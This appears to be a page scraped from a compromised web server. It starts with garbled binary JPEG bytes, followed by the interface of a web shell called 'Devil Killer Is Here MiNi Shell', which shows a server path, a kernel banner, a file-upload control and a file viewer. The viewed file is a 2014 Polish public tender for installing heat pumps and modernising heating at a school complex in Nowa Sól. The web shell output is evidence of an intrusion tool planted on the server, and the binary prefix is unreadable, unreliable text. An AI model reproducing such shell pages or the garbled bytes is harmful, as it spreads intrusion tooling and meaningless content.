JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140423/137752-N-2014.html

<p class="kh_header"><b>Nowa Sól: Termomodernizacja budynków Zespołu Szkół Ponadgimnazjalnych nr 2 w Nowej Soli w oparciu o odnawialne źródła energii w systemie : zaprojektuj i wybuduj</b><br>
<b>Numer ogłoszenia: 137752 - 2014; data zamieszczenia: 23.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosolski , ul. Moniuszki 3B, 67-100 Nowa Sól, woj. lubuskie, tel. 68 4586800, faks 68 4586831.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nowosolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków Zespołu Szkół Ponadgimnazjalnych nr 2 w Nowej Soli w oparciu o odnawialne źródła energii w systemie : zaprojektuj i wybuduj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie prowadzone dla zamówienia publicznego o wartości szacunkowej poniżej 5 186 000
euro.
Przedmiotem zamówienia jest usługa wraz z robotą budowlaną w zakresie wykonania prac projektowych
oraz robót budowlanych dla wykonania układu pomp ciepła z podłączeniem do istniejącego węzła
cieplnego opartego na istniejącym piecu gazowym wraz z modernizacją instalacji c.o. i c.w.u w
budynkach Zespołu Szkół Ponadgimnazjalnych w Nowej Soli w formule : zaprojektuj i wybuduj.
c.Zaopatrzenie w energię elektryczną zgodnie z technicznymi warunkami przyłączenia. Wymagane jest zwiększenie mocy zasilania, które wykonawca wykona na podstawie warunków przyłączenia.
d.Ogrzewanie i ciepła woda użytkowa z lokalnych źródeł ciepła opartych o pompy ciepła z istniejącej
centralnej kotłowni gazowej zlokalizowanej w budynku kotłowni.
e.Do zasilania wody i odprowadzenia ścieków wykorzystane będą istniejące przyłącza.
f.Podstawowe założenia i dane do projektowania i oszacowania w zakresie zamówienia:
a.liczba mieszkańców internatu 40 osób,
b.kubatura budynków szkolnych łącznie 18353,00 m3 w tym:-budynek internatu - 5317,00 m3 ;
-budynek łącznika internatu - 2912,00 m3;
-budynek dydaktyczno - warsztatowy - 10124,00 m3;
c.zużycie energii elektrycznej z ostatnich trzech lat:
2011 81159 kWh; 2012 - 88427 kWh; 2013 - 87821 kWh;
g.zużycie gazu (c.o. oraz c.w.u.) z ostatnich trzech lat:
zużycie łącznie: 2011 - 75795 m3; 2012 - 95726 m3 ; 2013 - 105179 m3;
w tym:2011: I.2362m3; II.13243m3; III.13085m3; IV.5535m3; V.3053m3; VI.1187m3; VII.708m3;
VIII.1352m3; IX.3436m3; X.7773m3; XI.10632m3; XII.15061m3;
2012: I.15685m3; II.17009m3; III.11149m3; IV.8071m3; V.1876m3; VI.2269m3; VII.1149m3;
VIII.1108m3; IX.2939m3; X.7215m3; XI.12173m3; XII.14713m3;
2013: I.16569m3; II.15433m3; III.15040m3; IV.9054m3; V.1844m3; VI.1487m3; VII.934m3;
VIII.1337m3; IX.2824m3; X.7775m3; XI.11446m3; XII.20226m3;zużycie zimnej wody (szkoła + internat) z ostatnich trzech lat:
2011 - 2239 m3 ; 2012 -2437 m3 ; 2013 - 2363 m3 ;
i.źródła zasilania:

1.układ biwalentny z zastosowaniem pomp ciepła:
hybryda współpracująca z istniejącym ogrzewaniem gazowym (piec gazowy BUDERUS
400kW).Zaprojektowany system musi działać w sposób inteligentny i skojarzony. Automatyka sterująca pracą instalacji c.o. musi pozwalać na swobodne programowanie
oraz automatyczne załączenie kotła w okresie szczytowym.
2.głębokość i ilość odwiertów dla pozyskania dolnego źródła ciepła, uzależniona jest od
powierzchni działki 148/3 i możliwości zagospodarowania jej części na ten cel, a także
od projektu prac geologicznych wykonywanego na etapie projektowania.
3.strefa ogrzewania obiektów szkolnych - niskotemperaturowa;
4.modernizacja instalacji c.o., c.w.u. obejmująca: modernizację elementów instalacji w
budynkach wraz z termostatami - potrzebę modernizacji i szczegółowy zakres określi
dokumentacja techniczna. W ramach modernizacji należy przewidzieć zaprojektowanie
dodatkowego wymiennika ciepłej wody (istniejący zbiornik pojemnościowy c.w.u. 0,5
m3). Ponadto dokumentacja modernizacji musi przewidywać dopływ ciepłej wody
regulowanej termo zaworami.
Uwaga:
1.Równolegle do niniejszego zamówienia prowadzone będą prace termomodernizacyjne związane
z realizacją zamówienia pn.Termomodernizacja Zespołu Szkół Ponadgimnazjalnych nr 2 w
Nowej Soli. Informacje dotyczące stolarki okiennej i drzwiowej oraz danych w zakresie izolacji
termicznych zawarte zostały w projekcie termomodernizacji elewacji budynków Zespołu Szkół
Ponadgimnazjalnych nr 2.
2.Informacje dotyczące instalacji c.o - dane poglądowe zawarte w inwentaryzacji obiektu.
3.Informacje dotyczące możliwości wykorzystania powierzchni na wykonanie dolnego źródła
ciepła - dane poglądowe zawarte w mapie ewidencyjnej w skali 1:1000 oraz mapie sytuacyjnej .
Wymagania Zamawiającego w stosunku do przedmiotu zamówienia:
1.Przedmiot zamówienia zostanie zrealizowany z materiałów wykonawcy.
2.Zamawiający wymaga, aby przy wykonywaniu robót budowlanych i instalacyjnych stosować wyroby,
które zostały dopuszczone do obrotu oraz powszechnego lub jednostkowego stosowania w
budownictwie. Wszystkie niezbędne elementy powinny być wykonane w standardzie i zgodnie z
obowiązującymi normami.
3.Zamawiający wymaga, aby elementy konstrukcyjne miały zapewnioną trwałość nie mniejszą niż 20
lat, instalacje w zakresie orurowania i okablowania powinny zapewnić użytkowanie w okresie nie
krótszym niż 10 lat.
4.Wymagany minimalny okres gwarancji na przedmiot zamówienia w zakresie robót budowlanych 60
miesięcy, na zamontowany osprzęt również minimum 36 miesięcy. Świadczenie usług serwisowych w
okresie gwarancyjnym - wymagany czas reakcji na zgłoszenie awarii: 24 godziny od momentu
zgłoszenia, Wykonawca zobowiązany będzie do podania formy zgłoszenia awarii i potwierdzenia
przyjęcia zgłoszenia, ze wskazaniem osób odpowiedzialnych za potwierdzenie zgłoszenia, ich
numerów telefonów, faksów i poczty elektronicznej (e-mail).
5.Wykonawca przeprowadzi szkolenie personelu w siedzibie zamawiającego, w zakresie eksploatacji
oraz obsługi zainstalowanych urządzeń.
6.Wykonawca w ramach przedmiotu zamówienia winien wykonać:
a.w I etapie: Dokumentację techniczną a w szczególności:
-projekt prac geologicznych,
-mapę do celów projektowych,
-projekt budowlany,
-projekt wykonawczy,
-projekt powykonawczy (po zakończeniu realizacji).
Zamawiający zastrzega sobie prawo do uzgadniania zastosowanych w projekcie rozwiązań
technicznych na każdym etapie sporządzania dokumentacji projektowej.
Wykonawca po zakończeniu prac projektowych zobowiązany będzie do uzyskania akceptacji
projektu przez Zamawiającego oraz uzyskania wszelkich opinii, uzgodnień, pozwoleń i innych
dokumentów wymaganych przepisami szczególnymi, niezbędnych do uzyskania decyzji o
pozwoleniu na budowę i uzyskania pozwolenia na budowę;
b.w II etapie: Wykonie robót budowlanych w zakresie instalacji pomp ciepła i modernizacji c.o.
zgodnych z opracowanym wcześniej i zaakceptowanym przez Zamawiającego projektem a w
szczególności:
-dostarczenie niezbędnych urządzeń, przewodów, armatury i materiałów,
-napełnienie i odpowietrzenie układu cieczą niezamarzającą,
-wykonanie podłączenia, skonfigurowania i przepięcia układu bez zakłócenia zaopatrzenia
w ciepło istniejącego układu grzewczego,
-wykonanie ewentualnego demontażu elementów starego układu źródła w pomieszczeniach
kotłowni,
-wykonanie niezbędnych robót towarzyszących (np. zorganizowanie placu budowy,
zaplecza budowy, uporządkowania terenu po robotach, itp.),
-wykonanie szczegółowego rozruchu systemu i przekazanie Zamawiającemu do
eksploatacji,
-dostarczenie uaktualnionej instrukcji obsługi zamontowanego zasilania oraz dokumentacji
powykonawczej,
Ogólne warunki wykonania i odbioru robót:
1.W ramach przekazania placu budowy zamawiający przekaże wykonawcy cześć terenu niezbędnego
do wykonania prac budowlanych. Zamawiający wskaże wykonawcy punkt poboru wody i energii
elektrycznej.
2.Wykonawca będzie zobowiązany do przyjęcia odpowiedzialności od następstw i za wyniki
działalności w zakresie:
-organizacji robot,
-zabezpieczenia osób trzecich,
-ochrony środowiska,
-warunków BHP,
-warunków bezpieczeństwa ruchu drogowego związanego z wykonaniem stanowiska,
-zabezpieczeniem terenu robót,
-zabezpieczenia ciągów komunikacyjnych przyległych do terenu robót od następstw prowadzonych
robót.
3.Wyroby budowlane i instalacyjne, stosowane w trakcie wykonywania robót budowlanych, mają
spełniać wymagania polskich przepisów prawa, a wykonawca będzie posiadał dokumenty
potwierdzające, że zostały one wprowadzone do obrotu zgodnie z ustawą o wyrobach budowlanych i
posiadają wymagane parametry określone w specyfikacji technicznej wykonania i odbioru robót.
4.Zamawiający przewiduje bieżącą kontrole wykonywanych robót. W celu zapewnienia współpracy z
wykonawcą i prowadzenia kontroli wykonywanych robót zamawiający przewiduje ustanowienie
osoby upoważnionej do kontaktów oraz Inspektora Nadzoru inwestorskiego.
5.Kontroli będą podlegały w szczególności:
-rozwiązania projektowe w aspekcie ich zgodności z warunkami umowy,
-stosowane gotowe wyroby budowlane w odniesieniu do dokumentów potwierdzających ich
dopuszczenie do obrotu oraz zgodności parametrów z danymi zawartymi w projekcie,
-wyroby budowlane lub elementy wytworzone na budowie,
-jakość i dokładność wykonania prac,
-prawidłowość funkcjonowania zamontowanych urządzeń i wyposażenia,
-prawidłowość połączeń funkcjonalnych,
-sposób wykonania przedmiotu umowy w aspekcie zgodności wykonania z dokumentacją
projektową i umową.
6.Ubezpieczenia
Wykonawca w dniu podpisania umowy zobowiązuje się dostarczyć Zamawiającemu Polisę
ubezpieczeniową z tytułu Odpowiedzialności Cywilnej na okres obejmujący czas realizacji
przedmiotu zamówienia, do wysokości minimum całkowitego wynagrodzenia umownego netto.
7.Zamawiający ustala następujące rodzaje odbiorów:
-odbiór robót zanikających i ulegających zakryciu (w trakcie wykonywania robót), odbiór
dokonywany jest przez inspektora nadzoru inwestorskiego i potwierdzony wpisem w dzienniku
budowy,


-odbiór końcowy:
przedmiotem odbioru końcowego będzie wykonany kompletny przedmiot zmówienia. Ze
zgłoszeniem do odbioru końcowego Wykonawca przekaże Zamawiającemu:
-dziennik budowy,
-dokumentację powykonawczą, opisaną i skompletowaną w jednym egzemplarzu,
-wymagane dokumenty, protokóły i zaświadczenia z przeprowadzonych prób i sprawdzeń, instrukcje użytkowania, dokumenty gwarancyjne i inne dokumenty
wymagane stosownymi przepisami,
-oświadczenie kierownika budowy o zgodności wykonania robót z dokumentacją
projektową, obowiązującymi przepisami i normami,
-dokumenty (atesty, certyfikaty, deklaracje zgodności, itp.) potwierdzające, że
wbudowane wyroby budowlane są zgodne z art. 10 ustawy Prawo budowlane (opisane i
ostemplowane przez kierownika budowy i odpowiednio przez kierowników robót
branżowych).
Wywóz gruzu, nadmiaru ziemi i ewentualnych odpadów powstałych w trakcie robót wykonawca dokona
we własnym zakresie. Wymagane jest usuwanie z ciągów komunikacyjnych zanieczyszczeń
powodowanych ruchem pojazdów budowy.
Wynagrodzenie Wykonawcy:
8.Za wykonanie przedmiotu umowy przysługiwać będzie Wykonawcy wynagrodzenie ryczałtowe
zgodnie z ceną ofertową. Wynagrodzenie ryczałtowe obejmuje wszystkie koszty związane z
wykonaniem projektu oraz realizacją robót objętych opisem przedmiotu zamówienia, w tym ryzyko
Wykonawcy z tytułu oszacowania wszelkich kosztów związanych z realizacją zamówienia, a także
oddziaływania innych czynników mających lub mogących mieć wpływ na koszty. Niedoszacowanie,
pominięcie oraz brak rozpoznania przedmiotu i zakresu zamówienia nie może być podstawą do
żądania zmiany wynagrodzenia ryczałtowego określonego w umowie.
9.Każdy z Wykonawców winien dokonać wizji lokalnej terenu budowy celem sprawdzenia warunków
placu budowy oraz warunków związanych z wykonywaniem prac będących przedmiotem przetargu
oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny
prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub
pominięcia elementów niezbędnych do wykonania umowy. Koszt wizytacji miejsca budowy ponosi
Wykonawca.
10.Nie przewiduje się zaliczek na poczet wydatków Wykonawcy, związanych z realizacją zamówienia.
11.Rozliczenia i płatności:
Rozliczenie i realizacja płatności nastąpi zgodnie z umową.
Dla potrzeb odbioru robót, zamawiający ustala następujące elementy rozliczeniowe:
-projekt budowlany i wykonawczy wraz z pozwoleniem na budowę,
-wykonanie prac budowlanych i instalacyjnych wraz z dokumentacją wykonawczą oraz zgodnie z
obowiązującym Prawem budowlanym, obowiązującymi normami oraz sztuką budowlaną,
-roboty montażowe, instalacyjne i wykończeniowe wraz z dokumentacja wykonawczą dla tych
robót zgodnie z obowiązującym Prawem budowlanym, obowiązującymi normami oraz sztuką
budowlaną, uzyskanie pozwolenia na użytkowanie obiektu.
Wymagania szczegółowe
Przygotowanie terenu:
Na okres prowadzonych prac należy zadbać o zabezpieczenie terenu w celu zapewnienia bezpieczeństwa
uczniom i pracownikom ZSP nr 2.
W zakresie architektury:
Nie przewiduje się prac w zakresie istniejącej konstrukcji obiektu. Powierzchnie użytkowe
poszczególnych pomieszczeń budynku oraz ich funkcje nie ulegną zmianie za wyjątkiem proponowanych
lokalizacji pomieszczeń technicznych (kotłowni) na pompy ciepła.
Dla zapewnienia bezpieczeństwa pracowników i uczniów ZSP nr 2 wymagane jest wyznaczenie i
oznakowanie strefy bezpieczeństwa w trakcie prowadzonych robót.
Stolarka budowlana:
W przypadku konieczności wymiany/montażu - stolarka zgodnie z projektem termomodernizacji elewacji budynków Zespołu Szkół Ponadgimnazjalnych nr 2.
W zakresie konstrukcji:
Pomieszczenia przeznaczone na pompy ciepła powinny spełniać podstawowe wymagania dotyczące:
1)bezpieczeństwa konstrukcji
2)bezpieczeństwa pożarowego,
3)bezpieczeństwa użytkowania,
4)odpowiednich warunków higienicznych i zdrowotnych oraz ochrony środowiska, w tym:
5)ochrony przed hałasem
6)ochrony przed drganiami
7)odpowiedniej charakterystyki energetycznej budynku oraz racjonalizacji użytkowania energii.
Instalacja elektryczna:
1)instalacja oświetleniowa oraz instalacja gniazd wtykowych, dostosowane do funkcji pomieszczeń
technicznych na pompy ciepła,
2)zaopatrzenie w energię elektryczną zgodnie z technicznymi warunkami przyłączenia. Wymagane jest
zwiększenie mocy zasilania, które Wykonawca wykona zgodnie z warunkami przyłączenia.
3)instalacja elektryczna dla pomp ciepła trzyfazowa zgodna z wytycznymi projektowymi dostawcy
urządzeń,
Instalacja wentylacyjna:
1)w pomieszczeniach pomp ciepła wentylacja grawitacyjna lub mechaniczna zgodna obowiązującymi
przepisami i normami w tym zakresie i wytycznymi projektowymi dostawcy urządzeń
Instalacja wodno-kanalizacyjna:
1)do zasilania wody i odprowadzenia ścieków wykorzystane będą istniejące przyłącza.
Instalacja grzewcza:
Istniejące instalacje grzewcze w budynkach należy wpiąć w projektowaną kotłownię zasilaną pompami
ciepła wspomaganą centralną kotłownią gazową. Z uwagi na warunki dużej wilgotności powietrza w
pomieszczeniach piwnicznych elementy instalacji c.o. i c.w.u. należy zaprojektować i wykonać z
odpowiednich materiałów antykorozyjnych.
POMPY CIEPŁA
Zamawiający wymaga zastosowania sprężarkowych pomp ciepła solanka/woda, dla których dolnym
źródłem ciepła będzie pionowy, gruntowy wymiennik ciepła. Wszystkie zastosowane pompy powinny
posiadać co najmniej 60 miesięczną gwarancję oraz serwis zapewniający reakcję do 24 godzin od
zgłoszenia awarii.
a)Pompy ciepła:
Zamawiający wymaga, aby zastosowane pompy ciepła posiadały parametry funkcjonalne i
wydajnościowe nie gorsze niż te zamieszczone w tabeli opisanej  w ust.3 SIWZ tj. w :OPIS PRZEDMIOTU ZAMÓWIENIA; POMPY CIEPŁA lit.a).
Dopuszcza się stosowanie urządzeń i rozwiązań równoważnych posiadających nie gorsze parametry
techniczno - użytkowe.
b)Rurociągi i elementy pionowego wymiennika gruntowego
Zamawiający wymaga, że zaprojektowane zostaną pionowe wymienniki gruntowe, stanowiące dolne
źródło dla pomp ciepła. Zamawiający wymaga, aby pionowe wymienniki ciepła posiadały parametry
funkcjonalne i techniczne nie gorsze niż:
-sonda fi40 x 3,7 mm PE100 SDR11, 4 x 180 m,- połączenie sond ze studnią wykonać za pomocą zgrzewu elektrooporowego,
-przewód sondy z wewnętrznymi lamelami do wymuszenia ruchu turbulentnego PN16 SDR11 o
średnicy wynikającej z opracowanej dokumentacji projektowej,
-głębokość pojedynczego odwiertu nie mniejsza niż 180 m p.p.t.,
-odległość pomiędzy osiami odwiertów nie mniejsza niż 10 m,
-medium: wodny roztwór glikolu propylenowego z pakietem inhibitorów korozji ;
-wymiennik powinien być zaprojektowany z jednego odcinka rury - nie dopuszcza się łączenia rur w
odwiercie,
-materiał do wypełnienia przestrzeni pierścieniowej o następujących parametrach podstawowych:
Gęstość gotowej zawiesiny: 1,83 kg/l
Współczynnik przewodności cieplnej: 0,478 W mK
Zawartość wilgoci w materiale do wypełnienia przestrzeni pierścieniowej przed zmieszaniem z wodą:
mniej l,0%,
-obszar pomiędzy wykonanymi pionowymi sondami przed zasypaniem oznakować taśmami
ostrzegawczymi,
-obszar pomiędzy wykonanymi pionowymi sondami przed zasypaniem oznakować taśmami
ostrzegawczymi,
Ilość odwiertów dla pomp ciepła, zasilających budynek dobierze Wykonawca na podstawie
projektowanego obciążenia cieplnego oraz zapotrzebowania na ciepło do pokrycia c.o. i c.w.u. z
uwzględnieniem rzeczywistej wydajności cieplnej pionowych wymienników gruntowych.
Zamawiający wymaga aby zaprojektowane dolne źródła ciepła zapewniły wydajność cieplną
umożliwiającą instalację pomp ciepła i zapotrzebowania na ciepło budynku przez okres nie krótszy niż 15
lat. Zamawiający wymaga przedstawienia 50 letnich gwarancji na sondy.
c)Studnie rozdzielaczowe
Zamawiający wymaga, aby zaprojektowane studnie rozdzielaczowe posiadały parametry funkcjonalne i
techniczne nie gorsze niż:
-studnie wykonane w całości z materiału HDPE,
-konstrukcja odporna na nacisk ziemi,
-wyposażone w stały kolektor wielosekcyjny z HDPE 100,
-szczelne przejście sekcji kolektora przez ściany studni,
-sekcje kolektora wyprowadzane ze studni parami: zasilanie/powrót,
-belka kolektora zasilającego wyposażona w rotametry na każdej sekcji,
-belka kolektora powrotnego wyposażona w zawory odcinające na każdej sekcji,
-belki kolektorów wyposażone: w automatyczne odpowietrzniki z zaworami odcinającymi oraz
zawory do napełniania i opróżniania układu.
Ilość sekcji w poszczególnych studniach rozdzielaczowych wynikać będzie z projektowanego
obciążenia budynku oraz rzeczywistej wydajności pionowych wymienników gruntowych przy
zachowaniu minimalnej głębokości odwiertu 180 m p.p.t.
Równoważność
1)Ewentualne nazwy własne znajdujące się w SIWZ bądź innym integralnym do SIWZ dokumencie
zostały przywołane przykładowo i nie mogą być traktowane jako rekomendacja ich nabycia, użycia, czy
promocji.
2)Zamawiający dopuszcza składanie ofert równoważnych. Wskazane w SIWZ bądź innym integralnym
do SIWZ dokumencie materiały, wyroby, systemy, urządzenia Zamawiający traktuje jako określenie
wymaganych minimalnych parametrów użytkowych, funkcjonalnych, technicznych lub standardów
jakościowych .
3)Ciężar udowodnienia, że produkt jest równoważny w stosunku do wymogu określonego przez
Zamawiającego spoczywa na Wykonawcy (art.39 ust.5 ustawy pzp).
4)Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany na każde żądanie
Zamawiającego wykazać, że zaoferowane przez niego produkty są nie gorsze od produktów wymaganych
przez Zamawiającego. W przypadku oferowania rozwiązań równoważnych w stosunku do rozwiązań
określonych w dokumentacji projektowej i SIWZ, Wykonawca zobowiązany jest do przedstawienia
dokumentów potwierdzających ich równoważność takich jak: parametry techniczne, jakościowe,
eksploatacyjne, funkcjonalność, certyfikaty, aprobaty techniczne z podaniem nazwy podmiotu
wydającego oraz terminu ważności dokumentu.5) Zaoferowanie wyrobów lub materiałów równoważnych nie może prowadzić do zmiany projektu.
Wymagania jakościowe
Wszystkie materiały użyte do wykonania zamówienia muszą posiadać dopuszczenie do stosowania w
budownictwie oraz być pierwszego gatunku. Dokumentami dopuszczającymi do stosowania w
budownictwie są :
a)certyfikat zgodności z Polską ( Europejską ) Normą,
b)deklaracja zgodności z Polską ( Europejską ) Aprobatą Techniczną,
c)aprobatą techniczną, w przypadku wyrobów, dla których nie ustanowiono Polskiej Normy, jeżeli nie są
objęte certyfikacją określoną w ww. punkcie.
Wykonawca jest odpowiedzialny za jakość wykonywanych robót, za zgodność wykonania z Prawem
budowlanym i obowiązującymi w tym zakresie przepisami, uzgodnieniami i warunkami zawartymi w
dokumentacji projektowej, zawartą z Zamawiającym umową, uzgodnieniami z Zamawiającym
dokonanymi w trakcie realizacji przedmiotu zamówienia, zaleceniami nadzoru inwestorskiego,
obowiązującymi normami i warunkami technicznymi wykonania i odbioru robót oraz sztuką budowlaną.
W przypadku utraty uzyskanego dofinansowania przez Powiat Nowosolski z winy Wykonawcy jest
On zobowiązany do pokrycia w pełnej wysokości należnego dofinansowania, co przyjmuje do
wiadomości i akceptuje.
Wspólny Słownik Zamówień CPV:
45000000-7 Roboty budowlane;
71000000-8 Usługi architektoniczne, budowlane, inżynieryjne;
45231112-3 Instalacja rurociągów;
45232460-4 Roboty sanitarne;
45300000-0 Roboty instalacyjne w budynkach;
45330000-9 Roboty instalacyjne wodno - kanalizacyjne i sanitarne;
45310000-6 Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych;
45331100-7 Instalacje centralnego ogrzewania;
45100000-3 Roboty instalacyjne elektryczne;
1.Przedmiot zamówienia będzie finansowany ze środków własnych Zamawiającego oraz ze środków
Europejskiego Funduszu Rozwoju Regionalnego w ramach Lubuskiego Regionalnego Programu
Operacyjnego na lata 2007-2013, Priorytet III Ochrona i zarządzanie zasobami środowiska
przyrodniczego, Działanie 3.2. Poprawa jakości powietrza, efektywności energetycznej oraz rozwój
i wykorzystanie odnawialnych źródeł energii.
2.W ramach projektu zostaną również wykonane prace związane z poprawą efektywności energetycznej
poprzez docieplenie ścian zewnętrznych budynków szkoły, stropodachów i wymianie stolarki
okiennej i drzwiowej. W/w prace są objęte odrębnym postępowaniem o udzielenie zamówienia
publicznego i będą wykonywane równolegle z przedmiotem niniejszego postępowania.
3.Przedmiotem zamówienia realizowanego w systemie : zaprojektuj i wybuduj obejmuje:
a.wykonanie prac projektowych w zakresie instalacji pomp ciepła oraz modernizacji c.o. i c.w.u.
oraz podłączenia zaprojektowanej instalacji do istniejącego węzła cieplnego opartego na kotłowni
gazowej,
b.wykonanie robót budowlanych związanych z wykonaniem modernizacji instalacji c.o. i c.w.u.
oraz wykonanie układu pomp ciepła z podłączeniem do istniejącego węzła cieplnego opartego na
kotłowni gazowej.
4.W skład zadania wchodzi sporządzenie projektu budowlanego (wraz z uzyskaniem niezbędnych
opinii, pozwoleń, uzgodnień), uzyskanie pozwolenia na budowę, sporządzenie niezbędnych
projektów wykonawczych, oraz wykonanie robót budowlanych na podstawie w/w projektów wraz ze
zgłoszeniem zakończenia robót i uzyskaniem pozwolenia na użytkowanie. Zamówienie obejmuje
również wszelkie prace i koszty niezbędne do poniesienia w celu przygotowania w/w inwestycji do
realizacji tz. wykonawca pokryje ewentualne koszty przekładek sieci.
